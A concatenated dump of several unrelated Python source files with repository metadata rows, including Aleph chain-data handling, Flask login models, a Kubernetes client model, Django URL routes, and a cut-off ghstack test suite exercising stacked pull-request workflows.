return IncomingStatus.MESSAGE_HANDLED, []
else:
seen_ids[ids_key] = height
else:
seen_ids[ids_key] = height
LOGGER.debug("New message to store for %s." % item_hash)
# message.update(new_values)
updates["$set"] = {
"content": json_content,
"size": len(content.raw_value),
"item_content": message.get("item_content"),
"item_type": message.get("item_type"),
"channel": message.get("channel"),
"signature": message.get("signature"),
**updates.get("$set", {}),
}
should_commit = True
if should_commit:
update_op = UpdateOne(filters, updates, upsert=True)
bulk_ops = [DbBulkOperation(Message, update_op)]
# Capped collections do not accept updates that increase the size, so
# we must ignore confirmations.
if existing is None:
bulk_ops.append(DbBulkOperation(CappedMessage, update_op))
return IncomingStatus.MESSAGE_HANDLED, bulk_ops
return IncomingStatus.MESSAGE_HANDLED, []
async def process_one_message(message: Dict, *args, **kwargs):
"""
Helper function to process a message on the spot.
"""
status, ops = await incoming(message, *args, **kwargs)
for op in ops:
await op.collection.collection.bulk_write([op.operation])
async def get_chaindata(messages, bulk_threshold=2000):
"""Returns content ready to be broadcasted on-chain (aka chaindata).
If message length is over bulk_threshold (default 2000 chars), store list
in IPFS and store the object hash instead of raw list.
"""
chaindata = {"protocol": "aleph", "version": 1, "content": {"messages": messages}}
content = json.dumps(chaindata)
if len(content) > bulk_threshold:
ipfs_id = await add_json(chaindata)
return json.dumps(
{"protocol": "aleph-offchain", "version": 1, "content": ipfs_id}
)
else:
return content
async def get_chaindata_messages(
chaindata: Dict, context: TxContext, seen_ids: Optional[List] = None
):
config = get_config()
protocol = chaindata.get("protocol", None)
version = chaindata.get("version", None)
if protocol == "aleph" and version == 1:
messages = chaindata["content"]["messages"]
if not isinstance(messages, list):
error_msg = f"Got bad data in tx {context!r}"
raise InvalidContent(error_msg)
return messages
if protocol == "aleph-offchain" and version == 1:
assert isinstance(chaindata.get("content"), str)
if seen_ids is not None:
if chaindata["content"] in seen_ids:
# is it really what we want here?
LOGGER.debug("Already seen")
return None
else:
LOGGER.debug("Adding to seen_ids")
seen_ids.append(chaindata["content"])
try:
content = await get_json(chaindata["content"], timeout=10)
except AlephStorageException:
# Let the caller handle unavailable/invalid content
raise
except Exception as e:
error_msg = f"Can't get content of offchain object {chaindata['content']!r}"
LOGGER.exception("%s", error_msg)
raise ContentCurrentlyUnavailable(error_msg) from e
try:
messages = await get_chaindata_messages(content.value, context)
except AlephStorageException:
LOGGER.debug("Got no message")
raise
LOGGER.info("Got bulk data with %d items" % len(messages))
if config.ipfs.enabled.value:
try:
LOGGER.info(f"chaindata {chaindata}")
await PermanentPin.register(
multihash=chaindata["content"],
reason={
"source": "chaindata",
"protocol": chaindata["protocol"],
"version": chaindata["version"],
},
)
# Some IPFS fetches can take a while, hence the large timeout.
await asyncio.wait_for(pin_hash(chaindata["content"]), timeout=120)
except asyncio.TimeoutError:
LOGGER.warning(f"Can't pin hash {chaindata['content']}")
return messages
else:
error_msg = f"Got unknown protocol/version object in tx {context!r}"
LOGGER.info("%s", error_msg)
raise InvalidContent(error_msg)
async def incoming_chaindata(content: Dict, context: TxContext):
"""Incoming data from a chain.
Content can be inline of "offchain" through an ipfs hash.
For now we only add it to the database, it will be processed later.
"""
await PendingTX.collection.insert_one(
{"content": content, "context": asdict(context)}
)
| 35.827354 | 88 | 0.610489 |
ae031947aa305d704ac5713b165fe51ba01c3a70
| 1,870 |
py
|
Python
|
app/models.py
|
andyhoang7/flaskFBlogin
|
773b85842eb0e4ab6c0671402058a3cc808b3063
|
[
"MIT"
] | null | null | null |
app/models.py
|
andyhoang7/flaskFBlogin
|
773b85842eb0e4ab6c0671402058a3cc808b3063
|
[
"MIT"
] | null | null | null |
app/models.py
|
andyhoang7/flaskFBlogin
|
773b85842eb0e4ab6c0671402058a3cc808b3063
|
[
"MIT"
] | null | null | null |
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager, UserMixin
from flask_dance.consumer.storage.sqla import OAuthConsumerMixin
db = SQLAlchemy()
class User(UserMixin, db.Model):
__tablename__="users"
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(256), unique=True)
class OAuth(OAuthConsumerMixin, db.Model):
provider_user_id = db.Column(db.String(256), unique=True, nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)
user = db.relationship(User)
class Token(db.Model):
id = db.Column(db.Integer, primary_key=True)
uuid = db.Column(db.String, unique=True)
user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)
user = db.relationship(User)
class Scores(db.Model):
id = db.Column(db.Integer, primary_key=True)
wpm = db.Column(db.String)
time = db.Column(db.String)
error = db.Column(db.String)
user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)
user = db.relationship(User)
excerp_id = db.Column(db.Integer, db.ForeignKey('excerpts.id'), nullable=False)
excerp = db.relationship('Excerpts')
class Excerpts(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.String)
# setup login manager
login_manager = LoginManager()
# login_manager.login_view = "facebook.login"
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
@login_manager.request_loader
def load_user_from_request(request):
# Login Using our Custom Header
api_key = request.headers.get('Authorization')
if api_key:
api_key = api_key.replace('Token ', '', 1)
token = Token.query.filter_by(uuid=api_key).first()
if token:
return token.user
return None
| 28.333333 | 83 | 0.703743 |
920441c303dc0b3ebd8084397e67015bde2180cb
| 6,286 |
py
|
Python
|
kubernetes/client/models/v1beta1_role_list.py
|
anemerovsky-essextec/python
|
6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/client/models/v1beta1_role_list.py
|
anemerovsky-essextec/python
|
6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/client/models/v1beta1_role_list.py
|
anemerovsky-essextec/python
|
6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.12.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1RoleList(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'api_version': 'str',
'items': 'list[V1beta1Role]',
'kind': 'str',
'metadata': 'V1ListMeta'
}
attribute_map = {
'api_version': 'apiVersion',
'items': 'items',
'kind': 'kind',
'metadata': 'metadata'
}
def __init__(self, api_version=None, items=None, kind=None, metadata=None):
"""
V1beta1RoleList - a model defined in Swagger
"""
self._api_version = None
self._items = None
self._kind = None
self._metadata = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
self.items = items
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
@property
def api_version(self):
"""
Gets the api_version of this V1beta1RoleList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:return: The api_version of this V1beta1RoleList.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1beta1RoleList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:param api_version: The api_version of this V1beta1RoleList.
:type: str
"""
self._api_version = api_version
@property
def items(self):
"""
Gets the items of this V1beta1RoleList.
Items is a list of Roles
:return: The items of this V1beta1RoleList.
:rtype: list[V1beta1Role]
"""
return self._items
@items.setter
def items(self, items):
"""
Sets the items of this V1beta1RoleList.
Items is a list of Roles
:param items: The items of this V1beta1RoleList.
:type: list[V1beta1Role]
"""
if items is None:
raise ValueError("Invalid value for `items`, must not be `None`")
self._items = items
@property
def kind(self):
"""
Gets the kind of this V1beta1RoleList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The kind of this V1beta1RoleList.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1beta1RoleList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param kind: The kind of this V1beta1RoleList.
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""
Gets the metadata of this V1beta1RoleList.
Standard object's metadata.
:return: The metadata of this V1beta1RoleList.
:rtype: V1ListMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1beta1RoleList.
Standard object's metadata.
:param metadata: The metadata of this V1beta1RoleList.
:type: V1ListMeta
"""
self._metadata = metadata
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1RoleList):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 29.650943 | 281 | 0.596246 |
75b5a85adfc584b7fe8b7f8b95d1161720cefce9
| 1,047 |
py
|
Python
|
Testing/urls.py
|
DudaEugen/JustTesting
|
7b62c7f5d1d918c3fe82bf00aff4009212427a6f
|
[
"MIT"
] | null | null | null |
Testing/urls.py
|
DudaEugen/JustTesting
|
7b62c7f5d1d918c3fe82bf00aff4009212427a6f
|
[
"MIT"
] | null | null | null |
Testing/urls.py
|
DudaEugen/JustTesting
|
7b62c7f5d1d918c3fe82bf00aff4009212427a6f
|
[
"MIT"
] | null | null | null |
from django.conf.urls import url
from .views import *
urlpatterns = [
url(r'^start(?:=(?P<test_pk>\d+))?$', TestingSessionCreateView.as_view(), name='create testing session'),
url(r'^session=(?P<pk>\d+)$', TestingView.as_view(), name='testing'),
url(r'^session=(?P<pk>\d+)/close$', CloseTestingSessionView.as_view(), name='close testing session'),
url(r'^session=(?P<session_pk>\d+)/solution=(?P<solution_pk>\d+)/correct$', RightSolutionView.as_view(),
name='right solution'),
url(r'^session=(?P<session_pk>\d+)/skip_task$', SkipTaskView.as_view(), name='skip task'),
url(r'^session=(?P<pk>\d+)/result$', TestingResultView.as_view(), name='testing result'),
url(r'^sessions$', ActiveTestingSessions.as_view(), name='active testing sessions'),
url(r'^results$', ResultsDispatcherView.as_view(), name='results dispatcher'),
url(r'^results/test=(?P<test_pk>\d+)&dates=(?P<from>[0-9]{2}.[0-9]{2}.[0-9]{4})-'
r'(?P<to>[0-9]{2}.[0-9]{2}.[0-9]{4})$', ResultsView.as_view(), name='testing results')
]
| 58.166667 | 109 | 0.646609 |
ac2c781e3e7704031454966ab93612199d134b7d
| 194 |
py
|
Python
|
empyror/config.py
|
GoogleGenius/empyror
|
c0a2db376e1e21eaa42ffda52b38ff5308e70c59
|
[
"Apache-2.0"
] | null | null | null |
empyror/config.py
|
GoogleGenius/empyror
|
c0a2db376e1e21eaa42ffda52b38ff5308e70c59
|
[
"Apache-2.0"
] | null | null | null |
empyror/config.py
|
GoogleGenius/empyror
|
c0a2db376e1e21eaa42ffda52b38ff5308e70c59
|
[
"Apache-2.0"
] | null | null | null |
import os
from dotenv import load_dotenv # type: ignore
import hikari
load_dotenv()
TOKEN: str = os.environ["TOKEN"]
GUILD_ID: hikari.Snowflake = hikari.Snowflake(os.environ["GUILD_ID"])
| 14.923077 | 69 | 0.747423 |
61622c0fa73510da21a8f448d471b45a079a17b1
| 46,877 |
py
|
Python
|
test_ghstack.py
|
pietern/ghstack
|
c524683caaa525a084a9f980868ce003213ed5e9
|
[
"MIT"
] | 1 |
2020-06-07T02:30:21.000Z
|
2020-06-07T02:30:21.000Z
|
test_ghstack.py
|
pietern/ghstack
|
c524683caaa525a084a9f980868ce003213ed5e9
|
[
"MIT"
] | null | null | null |
test_ghstack.py
|
pietern/ghstack
|
c524683caaa525a084a9f980868ce003213ed5e9
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import unittest
import subprocess
import os
import shutil
import tempfile
import re
import logging
import sys
import contextlib
import io
from typing import ClassVar, Dict, NewType, List, Tuple, Iterator
import ghstack.expecttest as expecttest
import ghstack.submit
import ghstack.land
import ghstack.shell
import ghstack.github
import ghstack.unlink
import ghstack.github_fake
from ghstack.submit import GitCommitHash
@contextlib.contextmanager
def captured_output() -> Iterator[Tuple[io.StringIO, io.StringIO]]:
new_out, new_err = io.StringIO(), io.StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
# TODO: Figure out how to make all git stuff in memory, so it runs
# faster. Need to work on OSX.
GH_KEEP_TMP = os.getenv('GH_KEEP_TMP')
SubstituteRev = NewType('SubstituteRev', str)
def strip_trailing_whitespace(text: str) -> str:
return re.sub(r' +$', '', text, flags=re.MULTILINE)
def indent(text: str, prefix: str) -> str:
return ''.join(prefix + line if line.strip() else line
for line in text.splitlines(True))
class TestGh(expecttest.TestCase):
proc: ClassVar[subprocess.Popen]
github: ghstack.github.GitHubEndpoint
rev_map: Dict[SubstituteRev, GitCommitHash]
upstream_sh: ghstack.shell.Shell
sh: ghstack.shell.Shell
def setUp(self) -> None:
# Set up a "parent" repository with an empty initial commit that we'll operate on
upstream_dir = tempfile.mkdtemp()
if GH_KEEP_TMP:
self.addCleanup(lambda: print("upstream_dir preserved at: {}".format(upstream_dir)))
else:
self.addCleanup(lambda: shutil.rmtree(upstream_dir))
self.upstream_sh = ghstack.shell.Shell(cwd=upstream_dir, testing=True)
# I plan to fix this type error soon
self.github = ghstack.github_fake.FakeGitHubEndpoint(self.upstream_sh)
local_dir = tempfile.mkdtemp()
if GH_KEEP_TMP:
self.addCleanup(lambda: print("local_dir preserved at: {}".format(local_dir)))
else:
self.addCleanup(lambda: shutil.rmtree(local_dir))
self.sh = ghstack.shell.Shell(cwd=local_dir, testing=True)
self.sh.git("clone", upstream_dir, ".")
self.rev_map = {}
self.substituteRev(GitCommitHash("HEAD"), SubstituteRev("rINI0"))
def writeFileAndAdd(self, filename: str, contents: str) -> None:
with self.sh.open(filename, "w") as f:
f.write(contents)
self.sh.git("add", filename)
def lookupRev(self, substitute: str) -> GitCommitHash:
return self.rev_map[SubstituteRev(substitute)]
def substituteRev(self, rev: str, substitute: str) -> None:
# short doesn't really have to be here if we do substituteRev
h = GitCommitHash(self.sh.git("rev-parse", "--short", rev))
self.rev_map[SubstituteRev(substitute)] = h
print("substituteRev: {} = {}".format(substitute, h))
self.substituteExpected(h, substitute)
def gh(self, msg: str = 'Update',
update_fields: bool = False,
short: bool = False,
no_skip: bool = False) -> List[ghstack.submit.DiffMeta]:
return ghstack.submit.main(
msg=msg,
username='ezyang',
github=self.github,
sh=self.sh,
update_fields=update_fields,
stack_header='Stack',
repo_owner='pytorch',
repo_name='pytorch',
short=short,
no_skip=no_skip)
def gh_land(self) -> None:
return ghstack.land.main(
sh=self.sh
)
# TODO: pass arguments
def gh_unlink(self) -> None:
ghstack.unlink.main(
sh=self.sh
)
def dump_github(self) -> str:
r = self.github.graphql("""
query {
repository(name: "pytorch", owner: "pytorch") {
pullRequests {
nodes {
number
baseRefName
headRefName
title
body
}
}
}
}
""")
prs = []
refs = ""
for pr in r['data']['repository']['pullRequests']['nodes']:
pr['body'] = indent(pr['body'].replace('\r', ''), ' ')
pr['commits'] = self.upstream_sh.git("log", "--reverse", "--pretty=format:%h %s", pr["baseRefName"] + ".." + pr["headRefName"])
pr['commits'] = indent(pr['commits'], ' * ')
prs.append("#{number} {title} ({headRefName} -> {baseRefName})\n\n"
"{body}\n\n{commits}\n\n".format(**pr))
# TODO: Use of git --graph here is a bit of a loaded
# footgun, because git doesn't really give any guarantees
# about what the graph should look like. So there isn't
# really any assurance that this will output the same thing
# on multiple test runs. We'll have to reimplement this
# ourselves to do it right.
refs = self.upstream_sh.git("log", "--graph", "--oneline", "--branches=gh/*/*/head", "--decorate")
return "".join(prs) + "Repository state:\n\n" + indent(strip_trailing_whitespace(refs), ' ') + "\n\n"
# ------------------------------------------------------------------------- #
def test_simple(self) -> None:
print("####################")
print("### test_simple")
print("###")
print("### First commit")
self.writeFileAndAdd("a", "asdf")
self.sh.git("commit", "-m", "Commit 1\n\nThis is my first commit")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
This is my first commit
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# Just to test what happens if we use those branches
self.sh.git("checkout", "gh/ezyang/1/orig")
print("###")
print("### Second commit")
self.writeFileAndAdd("b", "asdf")
self.sh.git("commit", "-m", "Commit 2\n\nThis is my second commit")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
This is my first commit
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
This is my second commit
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_empty_commit(self) -> None:
print("####################")
print("### test_empty_commit")
print("###")
print("### Empty commit")
self.sh.git("commit", "--allow-empty", "-m", "Commit 1\n\nThis is my first commit")
self.writeFileAndAdd("bar", "baz")
self.sh.git("commit", "-m", "Commit 2")
self.sh.test_tick()
self.gh('Initial')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 2 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 2**
* rMRG1 Commit 2
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 2
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_commit_amended_to_empty(self) -> None:
print("####################")
print("### test_empty_commit")
print("###")
self.writeFileAndAdd("bar", "baz")
self.sh.git("commit", "-m", "Commit 1\n\nThis is my first commit")
self.sh.test_tick()
self.gh('Initial')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
This is my first commit
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
self.sh.git('rm', 'bar')
self.sh.git("commit", "--amend", "--allow-empty")
self.sh.test_tick()
self.gh('Update')
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
This is my first commit
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_amend(self) -> None:
print("####################")
print("### test_amend")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the commit")
with self.sh.open("file1.txt", "w") as f:
f.write("ABBA")
self.sh.git("add", "file1.txt")
# Can't use -m here, it will clobber the metadata
self.sh.git("commit", "--amend")
self.substituteRev("HEAD", "rCOM2")
self.sh.test_tick()
self.gh('Update A')
self.substituteRev("origin/gh/ezyang/1/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
* rMRG2 Update A on "Commit 1"
Repository state:
* rMRG2 (gh/ezyang/1/head) Update A on "Commit 1"
* rMRG1 Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_amend_message_only(self) -> None:
print("####################")
print("### test_amend")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the commit")
# Can't use -m here, it will clobber the metadata
self.sh.git("filter-branch", "-f", "--msg-filter", "cat && echo 'blargle'", "HEAD~..HEAD")
self.substituteRev("HEAD", "rCOM2")
self.sh.test_tick()
self.gh('Update A', no_skip=True)
self.substituteRev("origin/gh/ezyang/1/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
* rMRG2 Update A on "Commit 1"
Repository state:
* rMRG2 (gh/ezyang/1/head) Update A on "Commit 1"
* rMRG1 Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_amend_out_of_date(self) -> None:
print("####################")
print("### test_amend_out_of_date")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
old_head = self.sh.git("rev-parse", "HEAD")
print("###")
print("### Amend the commit")
with self.sh.open("file1.txt", "w") as f:
f.write("ABBA")
self.sh.git("add", "file1.txt")
# Can't use -m here, it will clobber the metadata
self.sh.git("commit", "--amend")
self.sh.test_tick()
self.gh('Update A')
# Reset to the old version
self.sh.git("reset", "--hard", old_head)
with self.sh.open("file1.txt", "w") as f:
f.write("BAAB")
self.sh.git("add", "file1.txt")
# Can't use -m here, it will clobber the metadata
self.sh.git("commit", "--amend")
self.sh.test_tick()
self.assertRaises(RuntimeError, lambda: self.gh('Update B'))
# ------------------------------------------------------------------------- #
def test_multi(self) -> None:
print("####################")
print("### test_multi")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 1 and 2')
self.substituteRev("HEAD~", "rCOM1")
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_amend_top(self) -> None:
print("####################")
print("### test_amend_top")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the top commit")
with self.sh.open("file2.txt", "w") as f:
f.write("BAAB")
self.sh.git("add", "file2.txt")
# Can't use -m here, it will clobber the metadata
self.sh.git("commit", "--amend")
self.substituteRev("HEAD", "rCOM2A")
self.sh.test_tick()
self.gh('Update A')
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
* rMRG2A Update A on "Commit 2"
Repository state:
* rMRG2A (gh/ezyang/2/head) Update A on "Commit 2"
* rMRG2 Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_amend_bottom(self) -> None:
print("####################")
print("### test_amend_bottom")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the bottom commit")
self.sh.git("checkout", "HEAD~")
with self.sh.open("file1.txt", "w") as f:
f.write("ABBA")
self.sh.git("add", "file1.txt")
# Can't use -m here, it will clobber the metadata
self.sh.git("commit", "--amend")
self.substituteRev("HEAD", "rCOM1A")
self.sh.test_tick()
self.gh('Update A')
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
